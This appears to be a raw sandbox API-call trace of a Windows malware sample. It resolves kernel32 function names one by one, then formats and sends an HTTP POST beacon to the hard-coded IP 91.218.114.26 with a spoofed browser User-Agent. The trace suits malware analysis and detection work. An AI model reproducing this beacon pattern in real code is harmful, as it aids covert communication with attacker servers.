returned="CreateDirectoryExA" [0179.285] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0179.285] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0179.285] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0179.285] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0179.285] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0179.285] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0179.285] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0179.285] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0179.285] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0179.285] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0179.285] lstrlenA (lpString="CREATEEVENTA") returned 12 [0179.285] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0179.285] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0179.285] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0179.285] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0179.285] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0179.285] lstrlenA (lpString="CREATEEVENTW") returned 12 [0179.285] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0179.285] lstrlenA (lpString="CREATEFIBER") returned 11 [0179.285] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0179.285] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0179.285] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0179.285] lstrlenA (lpString="CREATEFILEA") returned 11 [0179.285] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0179.285] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0179.285] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0179.285] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0179.285] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0179.285] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0179.285] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0179.285] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0179.285] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0179.285] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0179.286] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0179.286] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0179.286] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0179.286] lstrlenA (lpString="CREATEFILEW") returned 11 [0179.286] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0179.286] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0179.286] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0179.286] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0179.286] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0179.286] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0179.286] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0179.286] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0179.286] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0179.286] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0179.286] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0179.286] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0179.286] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0179.286] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0179.286] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0179.286] lstrlenA (lpString="CREATEJOBSET") returned 12 [0179.286] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0179.286] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0179.286] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0179.286] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0179.286] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0179.286] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0179.286] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0179.286] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0179.286] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0179.286] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0179.286] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0179.286] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0179.286] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0179.286] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0179.286] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0179.286] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0179.286] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0179.286] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0179.287] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0179.287] lstrlenA (lpString="CREATEPIPE") returned 10 [0179.287] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0179.287] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0179.287] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0179.287] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0179.287] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0179.287] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0179.287] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0179.287] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0179.287] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0179.287] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0179.287] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0179.287] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0179.287] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0179.287] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0179.287] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0179.287] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0179.287] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0179.287] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0179.287] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0179.287] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0179.287] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0179.287] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0179.287] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0179.287] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0179.287] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0179.287] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0179.287] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0179.287] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0179.287] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0179.287] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0179.287] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0179.287] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0179.287] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0179.287] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0179.287] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0179.287] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0179.288] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0179.288] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0179.288] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0179.288] lstrlenA (lpString="CREATETHREAD") returned 12 [0179.288] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0179.288] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0179.288] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0179.288] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0179.288] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0179.288] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0179.288] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0179.288] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0179.288] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0179.288] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0179.288] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0179.288] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0179.288] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0179.288] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0179.288] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0179.288] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0179.288] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0179.288] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0179.288] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0179.288] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0179.288] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0179.288] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0179.288] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0179.288] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0179.288] lstrcpyA (in: lpString1=0x31ce648, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0179.288] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0179.288] lstrcpyA (in: lpString1=0x31ce648, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0179.288] lstrlenA (lpString="CTRLROUTINE") returned 11 [0179.288] lstrcpyA (in: lpString1=0x31ce648, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0179.288] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0179.288] lstrcpyA (in: lpString1=0x31ce648, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0179.288] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0179.288] lstrcpyA (in: lpString1=0x31ce648, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0179.289] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0179.289] lstrcpyA (in: lpString1=0x31ce648, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0179.289] lstrlenA (lpString="DEBUGBREAK") returned 10 [0179.289] lstrcpyA (in: lpString1=0x31ce648, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0179.289] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0179.289] lstrcpyA (in: lpString1=0x31ce648, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0179.289] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0179.289] lstrcpyA (in: lpString1=0x31ce648, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0179.289] lstrlenA (lpString="DECODEPOINTER") returned 13 [0179.289] lstrcpyA (in: lpString1=0x31ce648, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0179.289] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0179.289] lstrcpyA (in: lpString1=0x31ce648, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0179.289] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0179.289] lstrcpyA (in: lpString1=0x31ce648, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0179.289] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0179.289] lstrcpyA (in: lpString1=0x31ce648, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0179.289] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0179.289] lstrcpyA (in: lpString1=0x31ce648, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0179.289] lstrlenA (lpString="DELETEATOM") returned 10 [0179.289] lstrcpyA (in: lpString1=0x31ce648, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0179.289] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0179.289] lstrcpyA (in: lpString1=0x31ce648, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0179.289] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0179.289] lstrcpyA (in: lpString1=0x31ce648, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0179.289] lstrlenA (lpString="DELETEFIBER") returned 11 [0179.289] lstrcpyA (in: lpString1=0x31ce648, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0179.289] lstrlenA (lpString="DELETEFILEA") returned 11 [0179.289] lstrcpyA (in: lpString1=0x31ce648, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0179.289] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0179.289] lstrcpyA (in: lpString1=0x31ce648, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0179.289] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0179.289] lstrcpyA (in: lpString1=0x31ce648, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0179.289] lstrlenA (lpString="DELETEFILEW") returned 11 [0179.289] lstrcpyA (in: lpString1=0x31ce648, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0179.289] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0179.289] lstrcpyA (in: lpString1=0x31ce648, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0179.289] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0179.290] lstrcpyA (in: lpString1=0x31ce648, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0179.290] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0179.290] lstrcpyA (in: lpString1=0x31ce648, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0179.290] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0179.290] lstrcpyA (in: lpString1=0x31ce648, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0179.290] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0179.290] lstrcpyA (in: lpString1=0x31ce648, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0179.290] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0179.290] lstrcpyA (in: lpString1=0x31ce648, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0179.290] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0179.290] lstrcpyA (in: lpString1=0x31ce648, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0179.290] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0179.290] lstrcpyA (in: lpString1=0x31ce648, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0179.290] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0179.290] lstrcpyA (in: lpString1=0x31ce648, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0179.290] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0179.290] lstrcpyA (in: lpString1=0x31ce648, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0179.290] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0179.290] lstrcpyA (in: lpString1=0x31ce648, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0179.290] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0179.290] lstrcpyA (in: lpString1=0x31ce648, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0179.290] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0179.290] lstrcpyA (in: lpString1=0x31ce648, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0179.290] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0179.290] lstrcpyA (in: lpString1=0x31ce648, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0179.290] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0179.290] lstrcpyA (in: lpString1=0x31ce648, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0179.290] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0179.290] lstrcpyA (in: lpString1=0x31ce648, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0179.290] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0179.290] lstrcpyA (in: lpString1=0x31ce648, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0179.290] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0179.290] lstrcpyA (in: lpString1=0x31ce648, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0179.290] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0179.290] lstrcpyA (in: lpString1=0x31ce648, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0179.290] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0179.290] lstrcpyA (in: lpString1=0x31ce648, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0179.291] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0179.291] lstrcpyA (in: lpString1=0x31ce648, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0179.291] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0179.291] lstrcpyA (in: lpString1=0x31ce648, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0179.291] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0179.291] lstrcpyA (in: lpString1=0x31ce648, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0179.291] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0179.291] lstrcpyA (in: lpString1=0x31ce648, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0179.291] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0179.291] lstrcpyA (in: lpString1=0x31ce648, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0179.291] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0179.291] lstrcpyA (in: lpString1=0x31ce648, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0179.291] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0179.291] lstrcpyA (in: lpString1=0x31ce648, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0179.291] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0179.291] lstrcpyA (in: lpString1=0x31ce648, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0179.291] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0179.291] lstrcpyA (in: lpString1=0x31ce648, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0179.291] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0179.291] lstrcpyA (in: lpString1=0x31ce648, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0179.291] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0179.291] lstrcpyA (in: lpString1=0x31ce648, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0179.291] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0179.291] lstrcpyA (in: lpString1=0x31ce648, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0179.291] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0179.291] lstrcpyA (in: lpString1=0x31ce648, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0179.292] wsprintfA (in: param_1=0x750000, param_2="POST /%s HTTP/1.1\r\nUser-Agent: %s\r\nHost: %s\r\nContent-Type: %s\r\nContent-Length: %d\r\nConnection: Keep-Alive\r\n\r\n" | out: param_1="POST /logout/logout/bo.cgi?es=koofqsn6&xwum=4032244h HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko\r\nHost: 91.218.114.26\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 247\r\nConnection: Keep-Alive\r\n\r\n") returned 266 [0179.292] send (s=0x214, buf=0x750000*, len=513, flags=0) returned 513 [0179.292] shutdown (s=0x214, how=1) returned 0 [0179.292] recv (in: s=0x214, buf=0x31cf30c, len=1, flags=0 | out: buf=0x31cf30c*) returned 1 [0179.345] recv (in: s=0x214, buf=0x31cf30d, len=1, flags=0 | out: buf=0x31cf30d*) returned 1 [0179.345] recv (in: s=0x214, buf=0x31cf30e, len=1, flags=0 | out: buf=0x31cf30e*) returned 1 [0179.345] recv (in: s=0x214, buf=0x31cf30f, len=1, flags=0 | out: buf=0x31cf30f*) returned 1 [0179.345] recv (in: s=0x214, buf=0x31cf310, len=1, flags=0 | out: buf=0x31cf310*) returned 1 [0179.346] recv (in: s=0x214, buf=0x31cf311, len=1, flags=0 | out: buf=0x31cf311*) returned 1 [0179.346] recv (in: s=0x214, buf=0x31cf312, len=1, flags=0 | out: buf=0x31cf312*) returned 1 [0179.346] recv (in: s=0x214, buf=0x31cf313, len=1, flags=0 | out: buf=0x31cf313*) returned 1 [0179.346] recv (in: s=0x214, buf=0x31cf314, len=1, flags=0 | out: buf=0x31cf314*) returned 